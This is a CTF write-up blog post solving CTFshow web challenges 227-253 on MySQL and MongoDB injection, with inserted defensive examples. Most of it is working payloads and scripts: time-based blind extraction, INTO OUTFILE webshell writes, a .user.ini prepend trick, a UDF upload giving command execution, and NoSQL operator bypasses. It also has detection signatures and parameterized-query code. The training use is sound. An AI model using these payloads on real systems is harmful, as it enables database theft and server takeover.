
CTFshow Web Beginner Track: SQL Injection (Part 2)

web227

Following the method from the previous challenge, the flag table could no longer be found; I dumped the ctfshow_user table too and there was no flag in it either. I then wrote a one-line webshell and connected with AntSword, but still couldn't find the flag. I was stumped...

After reading y4's writeup it turned out this challenge is about stored procedures:

A stored procedure (Stored Procedure) is a database object that stores a complex program inside the database so that it can be called by external programs.

A stored procedure is a set of SQL statements that accomplishes a specific function. It is compiled, created and stored in the database, and a user can execute it by specifying its name and supplying parameters (where required).

Conceptually, stored procedures are simple: they are code encapsulation and reuse at the level of the database's SQL language.

After all, we aren't developers and don't need to go that deep. I think of a stored procedure as a user-defined function, just like writing your own function in PHP or Python.
See also: MySQL: viewing stored procedures and functions

Querying the information_schema.routines table reveals a stored procedure named getFlag:
Its definition is given as well:

BEGIN
SELECT "ctfshow{3b8b089d-6aaf-4176-9060-89786fcca3ba}";
END

So the flag is obtained directly. If you want to call the procedure, you can also do it like this:

';call getFlag();

Normally, though, this challenge builds on the earlier technique and hex encoding is still required. I didn't encode here because I had already dropped a webshell and connected with AntSword, found that api/index.php was writable, and simply deleted the filter; only then could I do it this way.

web228

Same as web226

web229

Same as web226

web230

Same as web226

web231

First, the injection point: it is in api/index.php, with password and username sent as POST parameters. As usual, I had trouble finding it.
My first thought was second-order injection, since the result of the UPDATE is echoed on update.php; boolean-based and even time-based injection would also work. My first attempt was:

password=0'+substr(hex(hex(database())),1,10)%23&username=1

This uses a double hex for second-order injection, but it felt bound to be cumbersome; with no filtering at all, the challenge is unlikely to require that. Then I wondered why only password is echoed while username isn't, which led to writing username directly:

password=0',username=database()%23&username=1

Whatever you put in the username position works.

According to yq's blog, this challenge doesn't actually need to worry about that, because the table being queried is a different one:

MySQL does not support subquery updates; more precisely, the table being updated cannot be used in a subquery in SET or WHERE. That English error message says you cannot SELECT values from a table and then UPDATE the same table within the same statement.

If the flag were in the table being updated, a subquery would be needed to read it out; reference article:
MySQL UPDATE does not support subquery updates
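
To show the defensive side of the web231 UPDATE injection, here is an added example (not part of this writeup or the challenge's own code) that rebuilds the string-concatenated UPDATE in Python, using sqlite3 as a stand-in for MySQL, and puts a parameterized version next to it. The schema, the sample rows, the function names and the payload are constructed assumptions; the payload keeps the `0',username=...` shape from the page but uses sqlite's `--` comment because sqlite has no `#` comment.

```python
import sqlite3

# Constructed schema mirroring the challenge's table (column names are an assumption)
SEED_ROWS = [("ctfshow", "ctfshow"), ("user1", "111"), ("user2", "222")]

def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE ctfshow_user (id INTEGER PRIMARY KEY, username TEXT, pass TEXT)")
    con.executemany("INSERT INTO ctfshow_user (username, pass) VALUES (?, ?)", SEED_ROWS)
    con.commit()
    return con

def update_password_vulnerable(con, username, password):
    # The value is pasted into the SQL text, so a quote inside `password` ends the
    # string literal and the rest of the value is parsed as SQL (the web231 shape:
    # password=0',username=...). Returns the SQL that actually ran.
    sql = f"UPDATE ctfshow_user SET pass = '{password}' WHERE username = '{username}'"
    con.execute(sql)
    con.commit()
    return sql

def update_password_safe(con, username, password):
    # Parameter binding: the driver passes the value separately from the statement,
    # so it can never extend the SET list or comment out the WHERE clause.
    sql = "UPDATE ctfshow_user SET pass = ? WHERE username = ?"
    con.execute(sql, (password, username))
    con.commit()
    return sql

def usernames(con):
    return [r[0] for r in con.execute("SELECT username FROM ctfshow_user ORDER BY id")]

def password_of(con, username):
    row = con.execute("SELECT pass FROM ctfshow_user WHERE username = ?", (username,)).fetchone()
    return row[0] if row else None

# Constructed payload in the web231 shape; `--` stands in for MySQL's `#` comment
PAYLOAD = "0',username='owned'--"

if __name__ == "__main__":
    con = make_db()
    update_password_vulnerable(con, "1", PAYLOAD)
    print(usernames(con))   # every row renamed: the WHERE clause was commented out
    con = make_db()
    update_password_safe(con, "ctfshow", PAYLOAD)
    print(usernames(con))   # unchanged; the payload is simply ctfshow's new password
```

sqlite does not reproduce two MySQL-specific details from this writeup: the `#` comment and the backslash escaping that the web234 `password=\` trick relies on. Parameter binding removes both problems at once, because the value never becomes part of the SQL text in the first place.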

web232

Same as above

web233

I don't know why it can't be done like the previous two challenges; I couldn't work it out. If that's not possible, blind injection is the only option, and the earlier script just needs modifying. The point to note is the sleep: it fires once per row, so the timeout threshold has to be estimated roughly accordingly:

"""
Author:feng
"""
import requests
from time import *
def createNum(n):
    num = 'true'
    if n == 1:
        return 'true'
    else:
        for i in range(n - 1):
            num += "+true"
        return num

url='http://e3a564a9-8fda-4003-895a-404b571895a4.chall.ctf.show:8080/api/'

flag=''
for i in range(1,100):
    min=32
    max=128
    while 1:
        j=min+(max-min)//2
        if min==j:
            flag+=chr(j)
            print(flag)
            if chr(j)=='}':
                exit()
            break

        #payload="' or if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))<{},sleep(0.02),1)#".format(i,j)
        #payload="' or if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag233333'),{},1))<{},sleep(0.02),1)#".format(i,j)
        payload="' or if(ascii(substr((select group_concat(flagass233) from flag233333),{},1))<{},sleep(0.02),1)#".format(i,j)

        data={
            'password':'1',
            'username':payload
        }
        try:
            # Response came back within the timeout: sleep() did not fire, so ascii(char) >= j
            r=requests.post(url=url,data=data,timeout=0.35)
            min=j
        except:
            # Timeout: sleep() fired, so ascii(char) < j
            max=j

        sleep(0.2)
    sleep(1)

web234

Still confused: there's no filtering, so why doesn't it work again...
After reading the other writeups it turns out there is filtering after all... the single quote is filtered. I'm too weak.
So this challenge uses a backslash to escape the single quote, for example:

password=\&username=,username=database()#

which effectively turns the query into:

update ctfshow_user set pass = '\' where username = ',username=database()#';

Then construct the statement in the username position.

web235

or is banned, and information_schema is quietly banned as well; the InnoDB engine can be used to bypass it, namely mysql.innodb_table_stats.

Overview of MySQL statistics

password=\&username=,username=(select group_concat(table_name) from mysql.innodb_table_stats where database_name=database())#

That dumps the table names; next comes column-name-less injection:
SQL injection (column-name-less injection using join)

password=\&username=,username=(select group_concat(`2`) from (select 1,2,3 union select * from flag23a1)x)#

A fairly classic technique.
This article is also a comprehensive reference:
Bypassing information_schema and column-name-less injection

web236

I didn't really get the point of this challenge... I assumed it was input filtering and couldn't think of a good approach for a long time; the writeups say it's output filtering??? But the output in this challenge starts with ctfshow{ and there's no flag in it... Then I tried this:

password=\&username=,username="flag"#

It still changes username to flag, and the output isn't filtered either... I don't understand why... Maybe the challenge has some problems?
So the previous challenge's technique works here.

web237

INSERT injection without any filtering: close the single quote, construct your own query, and insert the query result into the table:

username=1',(select group_concat(table_name) from information_schema.tables where table_schema=database()))#&password=1
username=1',(select group_concat(flagass23s3) from flag))#&password=1

web238

Spaces are filtered, so bypass them with parentheses:

username=2',(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())))#&password=1
username=2',(select(group_concat(column_name))from(information_schema.columns)where(table_name='flagb')))#&password=1

web239

Nothing much to say: or is filtered, and the routine is the same as before, using mysql.innodb_table_stats. Normally the next step would be column-name-less injection, but since * is banned, the usual subquery-based column-name-less injection doesn't seem to work? I can construct this:

select(group_concat(`2`))from(select(1),2,(3)union(select(`*`)from(flagbb)))x

But with * filtered, I couldn't work out how to dump all of flagbb's data without using *. The join subquery and the bit-by-bit comparison approaches both need *, so I was stuck. Then it occurred to me that the column name in the previous tables was always flag, so I queried flag directly, and it worked... I still don't know how the asterisk filter should be bypassed with a subquery in this challenge.

web240

Nothing much to say: sys, or and mysql are all banned, so the table name certainly can't be dumped; write a script to guess it based on the hint, and the column name is most likely still flag:

import requests
url_insert="http://517b800b-509d-4bc2-950e-559745adb2ce.chall.ctf.show:8080/api/insert.php"

# Guess table names of the form flag + five characters drawn from "ab", as the hint suggests
for v1 in "ab":
    for v2 in "ab":
        for v3 in "ab":
            for v4 in "ab":
                for v5 in "ab":
                    v="flag"+v1+v2+v3+v4+v5
                    # Each guess inserts the result of the subquery as a new row; wrong names simply fail
                    data={
                        'username':"1',(select(group_concat(flag))from({})))#".format(v),
                        'password':'1'
                    }
                    r=requests.post(url=url_insert,data=data)

After the script finishes, go to page.php and read it in reverse order to see the flag.

web241

DELETE injection. Thinking it through, boolean-based blind injection isn't possible, so only time-based blind injection remains. Just note that the response time is the number of rows multiplied by the sleep time:

"""
Author:feng
"""
import requests
from time import *
def createNum(n):
    num = 'true'
    if n == 1:
        return 'true'
    else:
        for i in range(n - 1):
            num += "+true"
        return num

url='http://224c4817-ece7-46e4-a9a5-185fdce4e641.chall.ctf.show:8080/api/delete.php'

flag=''
for i in range(1,100):
    min=32
    max=128
    while 1:
        j=min+(max-min)//2
        if min==j:
            flag+=chr(j)
            print(flag)
            if chr(j)=='}':
                exit()
            break

        #payload="if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))<{},sleep(0.01),1)".format(i,j)
        #payload="if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),{},1))<{},sleep(0.01),1)".format(i,j)
        payload="if(ascii(substr((select group_concat(flag) from flag),{},1))<{},sleep(0.01),1)".format(i,j)

        data={
            'id':payload
        }
        try:
            # Response came back within the timeout: sleep() did not fire, so ascii(char) >= j
            r=requests.post(url=url,data=data,timeout=0.2)
            min=j
        except:
            # Timeout: sleep() fired, so ascii(char) < j
            max=j

        sleep(0.2)
    sleep(1)

Improving accuracy is the same old routine: a sleep of even 0.1 seconds works, as long as there is a fixed interval between requests; then the result comes out without errors, whereas sending requests back to back causes problems. Hence the sleep(0.2) and sleep(1) at the end.

web242

Another blind spot in my repertoire: it seemed there was nothing that could be appended after INTO OUTFILE, which was puzzling. From yq1ng's blog:

SELECT ... INTO OUTFILE 'file_name'
        [CHARACTER SET charset_name]
        [export_options]

export_options:
    [{FIELDS | COLUMNS}
        [TERMINATED BY 'string']  // delimiter
        [[OPTIONALLY] ENCLOSED BY 'char']
        [ESCAPED BY 'char']
    ]
    [LINES
        [STARTING BY 'string']
        [TERMINATED BY 'string']
    ]
The OPTION parameters are optional; their possible values are:

`FIELDS TERMINATED BY 'string'`: sets the string used as the separator between fields; it may be one or more characters. The default is "\t".

`FIELDS ENCLOSED BY 'char'`: sets the character used to enclose field values; it must be a single character. No character is used by default.

`FIELDS OPTIONALLY ENCLOSED BY 'char'`: sets the character used to enclose character-type fields such as CHAR, VARCHAR and TEXT. No character is used by default.

`FIELDS ESCAPED BY 'char'`: sets the escape character; it must be a single character. The default is "\".

`LINES STARTING BY 'string'`: sets the characters that begin each line of data; it may be one or more characters. None is used by default.

`LINES TERMINATED BY 'string'`: sets the characters that end each line of data; it may be one or more characters. The default is "\n".

Having read this, it's clear how to write the shell. Any of these three options works:

  • FIELDS TERMINATED BY
  • LINES STARTING BY
  • LINES TERMINATED BY
filename=3.php' LINES STARTING BY '<?php eval($_POST[0]);?>'#

Learned something new.

web243

I couldn't work this one out; yq1ng's blog explains it, and it's absurd... The biggest pitfall in this challenge is /dump/index.php: it returns 403 Forbidden, and you're telling me there's an index.php there???
The screenshot showed the result after the file inclusion went through. Damn... I was swearing out loud; it's ridiculous.
Knowing that index.php exists, uploading a .user.ini comes to mind easily. But the format needs attention; the payload is:

filename=.user.ini' LINES STARTING BY ';' TERMINATED BY 0x0a6175746f5f70726570656e645f66696c653d66656e672e6a70670a#

First, make every line start with a semicolon, so the rows queried from the database are commented out.
Then end each line with that string; its hex decodes to:

auto_prepend_file=feng.jpg

There is a newline at the front, so auto_prepend_file starts on its own line and is not commented out. There is also a newline at the end, separating it from the next comment line, which gives this:

;1	ctfshow	ctfshow
auto_prepend_file=feng.jpg
;2	user1	111
auto_prepend_file=feng.jpg
;3	user2	222
auto_prepend_file=feng.jpg
;4	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg
;5	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg
;6	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg
;7	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg
;8	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg
;9	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg
;10	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg
;11	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg
;12	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg
;13	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg
;14	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg
;15	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg
;16	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg
;17	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg
;18	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg
;19	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg
;20	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg
;21	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg

Then upload feng.jpg; since php is filtered, short tags or hex can be used to bypass it:

filename=feng.jpg' LINES TERMINATED BY 0x3c3f706870206576616c28245f504f53545b305d293b3f3e#

One more rant about index.php: isn't this just a trap???

web244

Error-based injection with no filtering; pick any method:

?id=' or updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),1),1)-- -

?id=' or updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flag'),1),1)-- -

' or updatexml(1,concat(1,substr((select group_concat(flag) from ctfshow_flag),1,32),1),1)-- -

' or updatexml(1,concat(1,substr((select group_concat(flag) from ctfshow_flag),20,32),1),1)-- -

Because the XPath error message only shows 32 characters, the output has to be sliced.

web245

updatexml is filtered, but extractvalue remains; the technique is as follows:

?id=' or extractvalue(1,concat(0x7e,database(),0x7e))-- -

I won't write out the rest; it's the same technique.

web246

extractvalue is filtered; double-query error-based injection remains.
See the error-based injection post I wrote earlier:
Error-based injection
Those are basically the common error-based techniques. The principle of double-query injection is also covered by an article referenced there, which explains it very thoroughly.

Technique:

?id=' union select 1,count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 1,1),0x7e,floor(rand()*2))a from information_schema.columns group by a-- -

The trap in this challenge is that group_concat can't be used; limit must be used instead. Not sure why.

?id=' union select 1,count(*),concat((select flag2 from ctfshow_flags),0x7e,floor(rand()*2))a from information_schema.columns group by a-- -

That's how the flag is queried. No substr is used because double-query error-based injection has no length limit, so the complete flag comes out without slicing.

web247

If we still go with double-query injection, floor is filtered. Since rand()*2 lies in the range 0-2, ceil (round up) works in place of floor. The round function works too:

ROUND(X) – rounds X to an integer, with no decimal places
ROUND(X,D) – rounds X to D decimal places, where D is the number of digits after the decimal point. To keep D digits to the left of the decimal point, set D to a negative value.

There are twelve error-based injection techniques in total; do the others work?

1. floor + rand + group by
select * from user where id=1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
select * from user where id=1 and (select count(*) from (select 1 union select null union select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

2. ExtractValue
select * from user where id=1 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

3. UpdateXml
select * from user where id=1 and 1=(updatexml(1,concat(0x3a,(select user())),1));

4. Name_Const(>5.0.12)
select * from (select NAME_CONST(version(),0),NAME_CONST(version(),0))x;

5. Join
select * from(select * from mysql.user a join mysql.user b)c;
select * from(select * from mysql.user a join mysql.user b using(Host))c;
select * from(select * from mysql.user a join mysql.user b using(Host,User))c;

6. exp()  // apparently not usable on MySQL 5.7
select * from user where id=1 and Exp(~(select * from (select version())a));

7. geometrycollection()  // apparently not usable on MySQL 5.7
select * from user where id=1 and geometrycollection((select * from(select * from(select user())a)b));

8. multipoint()  // apparently not usable on MySQL 5.7
select * from user where id=1 and multipoint((select * from(select * from(select user())a)b));

9. polygon()  // apparently not usable on MySQL 5.7
select * from user where id=1 and polygon((select * from(select * from(select user())a)b));

10. multipolygon()  // apparently not usable on MySQL 5.7
select * from user where id=1 and multipolygon((select * from(select * from(select user())a)b));

11. linestring()  // apparently not usable on MySQL 5.7
select * from user where id=1 and linestring((select * from(select * from(select user())a)b));

12. multilinestring()  // apparently not usable on MySQL 5.7
select * from user where id=1 and multilinestring((select * from(select * from(select user())a)b));

I didn't try each one individually; exp-based injection didn't work, so the ones after it probably don't either, which leaves round and ceil.
Note that the flag column is named flag?. Using flag? directly raises an error because of the ? character, so wrap it in backticks:

?id=' union select 1,count(*),concat(0x7e,0x7e,(select `flag?` from ctfshow_flagsa limit 0,1),0x7e,ceil(rand()*2))a from information_schema.columns group by a-- -
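
From the detection side, the error-based payloads above (updatexml, extractvalue, floor/ceil/round over rand() with GROUP BY), the INTO OUTFILE / LINES STARTING BY writes of web242 and web243, the stacked CREATE FUNCTION ... SONAME of web248 and the sleep() oracles of web233 and web241 all leave recognisable strings in the request. The following is an added example, not part of this writeup or any project, that URL-decodes the request path from combined-format access-log lines and tags each line with the technique family it matches. The log format, the log lines and every function name are constructed; the request paths reuse payload shapes quoted in this writeup. The time-based payloads of web233 and web241 were POSTed, so they would not appear in the request line; the same signatures apply to a WAF or application log that records request bodies.

```python
import re
from urllib.parse import unquote_plus

# Signatures keyed by the technique family they indicate (constructed for this example)
SIGNATURES = {
    "time_based":  re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "error_based": re.compile(r"\b(updatexml|extractvalue)\s*\(|\b(floor|ceil|round)\s*\(\s*rand\s*\(", re.I),
    "file_write":  re.compile(r"\binto\s+(outfile|dumpfile)\b|\blines\s+(starting|terminated)\s+by\b", re.I),
    "stacked_udf": re.compile(r";\s*create\s+function\b.*\bsoname\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.|\bmysql\.innodb_table_stats\b", re.I),
}

# Combined access-log line: ip ident user [time] "METHOD path PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+)'
)

def decode(s):
    # Decode twice so double-encoded payloads are normalised as well
    return unquote_plus(unquote_plus(s))

def classify(line):
    """Return the decoded path plus the sorted names of matching signatures, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = decode(m.group("path"))
    hits = sorted(name for name, rx in SIGNATURES.items() if rx.search(path))
    return {"ip": m.group("ip"), "ts": m.group("ts"), "status": m.group("status"), "path": path, "hits": hits}

def scan(lines):
    """Keep only the lines that matched at least one signature."""
    return [c for c in map(classify, lines) if c and c["hits"]]

# Constructed log lines; the paths reuse payload shapes quoted in this writeup (web244, web246, web242, web248)
SAMPLE_LOG = [
    '10.0.0.5 - - [14/Feb/2021:10:00:01 +0800] "GET /api/?id=1&page=1&limit=10 HTTP/1.1" 200 512',
    '10.0.0.9 - - [14/Feb/2021:10:00:02 +0800] "GET /api/?id=%27%20or%20updatexml(1,concat(1,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),1),1)--%20- HTTP/1.1" 200 233',
    '10.0.0.9 - - [14/Feb/2021:10:00:03 +0800] "GET /api/?id=%27%20union%20select%201,count(*),concat((select%20flag2%20from%20ctfshow_flags),0x7e,floor(rand()*2))a%20from%20information_schema.columns%20group%20by%20a--%20- HTTP/1.1" 200 301',
    '10.0.0.9 - - [14/Feb/2021:10:00:04 +0800] "GET /api/?filename=3.php%27%20LINES%20STARTING%20BY%20%27%3C%3Fphp%20eval(%24_POST%5B0%5D)%3B%3F%3E%27%23 HTTP/1.1" 200 88',
    '10.0.0.9 - - [14/Feb/2021:10:00:05 +0800] "GET /api/?id=%27;CREATE%20FUNCTION%20sys_eval%20RETURNS%20STRING%20SONAME%20%27udf.so%27;--+&page=1&limit=10 HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["status"], hit["hits"])
```

The signatures are deliberately narrow: they match function calls and keywords that have no business in a numeric `id` or a filename, so a single hit is worth an alert rather than a score. A `file_write` hit on a request whose database account still has FILE privilege, or a `stacked_udf` hit at all, should be treated as a probable compromise of the database host rather than a mere probe.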

web248

MySQL UDF injection was also new to me; there are many articles online about the details. In short, a shared library (dll/so) is written into the target's plugin directory, which can be obtained via select @@plugin_dir. Also, this challenge allows stacked queries; at first I didn't think of stacking and assumed it was boolean-based, which really means I hadn't understood UDF injection: the final step of importing the function,

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so'; // import the UDF function

certainly requires stacking, so stacked injection must be possible; without it, game over.

I used a master's script and learned from it:

import requests

base_url="http://6de1e55c-ad86-4d42-a5bc-7d6205404db6.chall.ctf.show:8080/api/"
payload = []
text = ["a", "b", "c", "d", "e"]
udf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
for i in range(0,21510, 5000):
    end = i + 5000
    payload.append(udf[i:end])

p = dict(zip(text, payload))

for t in text:
    url = base_url+"?id=';select unhex('{}') into dumpfile '/usr/lib/mariadb/plugin/{}.txt'--+&page=1&limit=10".format(p[t], t)
    r = requests.get(url)
    print(r.status_code)

next_url = base_url+"?id=';select concat(load_file('/usr/lib/mariadb/plugin/a.txt'),load_file('/usr/lib/mariadb/plugin/b.txt'),load_file('/usr/lib/mariadb/plugin/c.txt'),load_file('/usr/lib/mariadb/plugin/d.txt'),load_file('/usr/lib/mariadb/plugin/e.txt')) into dumpfile '/usr/lib/mariadb/plugin/udf.so'--+&page=1&limit=10"
rn = requests.get(next_url)

uaf_url=base_url+"?id=';CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';--+"  # import the UDF function
r=requests.get(uaf_url)
nn_url = base_url+"?id=';select sys_eval('cat /flag.*');--+&page=1&limit=10"
rnn = requests.get(nn_url)
print(rnn.text)

web249

My first encounter with NoSQL injection; the challenge probably uses MongoDB.
Reference articles:
NoSQL injection notes
Obscure knowledge: how much do you know about NoSQL injection

$gt : >
$lt : <
$gte: >=
$lte: <=
$ne : !=<>
$in : in
$nin: not in
$all: all 
$or:or
$not: negated match (version 1.3.3 and above)
Fuzzy queries use a regular expression: db.customer.find({'name': {'$regex':'.*s.*'} })
/**
* : range query { "age" : { "$gte" : 2 , "$lte" : 21}}
* : $ne { "age" : { "$ne" : 23}}
* : $lt { "age" : { "$lt" : 23}}
*/
// find records with age = 22
db.userInfo.find({"age": 22});
// equivalent to: select * from userInfo where age = 22;
// find records with age > 22
db.userInfo.find({age: {$gt: 22}});
// equivalent to: select * from userInfo where age > 22;

The articles also cover the specific techniques.
This challenge hints that the flag is in flag, i.e. we need to find the value of flag; normally that would be id=flag, but it returns error.

y4 says the backend filters non-numeric id, probably with the intval function. This function has appeared many times in the PHP features section; use this property:
For a non-empty array, intval returns 1, which should bypass the intval check:

?id[]=flag

Successfully retrieved the flag.

web250

  $query = new MongoDB\Driver\Query($data);
  $cursor = $manager->executeQuery('ctfshow.ctfshow_user', $query)->toArray();

// no filtering
  if(count($cursor)>0){
    $ret['msg']='登陆成功';
    array_push($ret['data'], $flag);
  }

No filtering at all; $ne does the job:

username[$ne]=1&password[$ne]=1

A regex works too:

username[$regex]=.*&password[$regex]=.*

web251

Using the previous challenge's technique, but it returned the admin account's username and password:

Change it to username not equal to admin:

username[$ne]=admin&password[$ne]=1

Not sure why; maybe the challenge added an extra restriction like this?

web252

username can be neither admin nor admin1, so use a regular expression:

username[$regex]=^[^a].*$&password[$ne]=1

As for .pretty(), nothing special:

The purpose of MongoDB's find().pretty() method.

It displays the query results more readably on the command line, so they aren't too cramped.

web253

db.ctfshow_user.find({username:'$username',password:'$password'}).pretty()

No output. I felt it might be because username and password are wrapped in single quotes? But I was still confused about how a union injection would work... Looking at yq1ng's approach, it's blind injection: based on the previous challenges, guess that username is flag, then write a script:

"""
Author : feng
Time : 2021-2-14
"""
import requests

url="http://2184e9b4-619a-43dd-b8de-015a6a74fe3d.chall.ctf.show:8080/api/"

flag=""

for i in range(1,100):
    for j in "{-abcdefghijklmnopqrstuvwxyz0123456789}":
        payload="^{}.*$".format(flag+j)
        data={
            'username[$regex]':'flag',
            'password[$regex]':payload
        }
        r=requests.post(url=url,data=data)
        if r"\u767b\u9646\u6210\u529f" in r.text:  # JSON-escaped form of the login-success message
            flag+=j
            print(flag)
            if j=="}":
                exit()
            break

So my guess was wrong: those single quotes don't have the effect they would in MySQL, and the constructed payload still works; this challenge simply has no output.
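
The root cause shared by web249 through web253 is that PHP expands bracketed parameter names into nested arrays, so `username[$ne]=1` reaches the MongoDB driver as a query operator and `id[]=flag` reaches intval() as an array. The following is an added example (not part of this writeup or the challenge's code) that models that expansion in Python and shows the two checks a defender wants in front of the query: reject any nested value or `$`-prefixed key before building the login filter, and require `id` to be a string of digits rather than trusting intval(). The function names, the modelled PHP behaviour (`php_parse_query`, `php_intval_like`) and the sample query strings are constructed assumptions; the query strings reuse the shapes quoted in this writeup.

```python
import re
from urllib.parse import parse_qsl

# key[part1][part2]... : base name followed by zero or more bracket segments
BRACKET_KEY = re.compile(r"^([^\[\]]+)((?:\[[^\[\]]*\])*)$")

def php_parse_query(qs):
    """Expand PHP-style bracket keys the way $_GET/$_POST do (model, not PHP itself):
    a[b]=1 -> {'a': {'b': '1'}}, id[]=x -> {'id': ['x']}, plain keys stay strings."""
    result = {}
    for key, value in parse_qsl(qs, keep_blank_values=True):
        m = BRACKET_KEY.match(key)
        if not m:
            result[key] = value
            continue
        parts = [m.group(1)] + re.findall(r"\[([^\[\]]*)\]", m.group(2))
        node = result
        for part in parts[:-2]:
            if not isinstance(node.get(part), dict):
                node[part] = {}
            node = node[part]
        if len(parts) >= 2 and parts[-1] == "":
            # a trailing [] appends to a list (the web249 id[]=flag case)
            if not isinstance(node.get(parts[-2]), list):
                node[parts[-2]] = []
            node[parts[-2]].append(value)
        else:
            for part in parts[-2:-1]:
                if not isinstance(node.get(part), dict):
                    node[part] = {}
                node = node[part]
            node[parts[-1]] = value
    return result

def contains_operator(value):
    """True if any nested key starts with '$' (a MongoDB operator such as $ne, $regex, $gt)."""
    if isinstance(value, dict):
        return any(k.startswith("$") or contains_operator(v) for k, v in value.items())
    if isinstance(value, list):
        return any(contains_operator(v) for v in value)
    return False

def build_login_filter(params):
    """Hardened version of the web250 lookup: only plain strings reach the filter document,
    so {'$ne': ...} and {'$regex': ...} can never be passed through as credentials."""
    username, password = params.get("username"), params.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        raise ValueError("username and password must be plain strings")
    return {"username": username, "password": password}

def php_intval_like(value):
    """Model of the intval() behaviour the web249 bypass relies on (assumption: close enough to PHP):
    non-empty arrays give 1, empty arrays 0, strings give their leading integer or 0."""
    if isinstance(value, (list, dict)):
        return 1 if value else 0
    m = re.match(r"^\s*[+-]?\d+", str(value))
    return int(m.group()) if m else 0

def parse_id_safe(params):
    """Hardened version of the web249 check: a scalar digit string, not merely intval(x) != 0."""
    value = params.get("id")
    if not isinstance(value, str) or not value.isdigit():
        raise ValueError("id must be a numeric string")
    return int(value)

if __name__ == "__main__":
    # Constructed inputs in the shapes quoted above
    for qs in ("username[$ne]=1&password[$ne]=1", "username=admin&password=secret", "id[]=flag"):
        print(qs, "->", php_parse_query(qs), "operator:", contains_operator(php_parse_query(qs)))
```

The type check is the important part: the operator injection works because the application never asked whether `$_POST['username']` was a string, and the intval() bypass works because `intval(array) == 1` passes a "looks numeric" test. Checking the type of the raw parameter before any conversion closes both.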

This concludes the SQL injection section of CTFshow Web入门. It took 9 days to work through SQL injection, and I learned a great deal; I'm no longer clueless about SQL injection and have a countermeasure in mind for each kind of WAF. Next up is deserialization. Keep going!
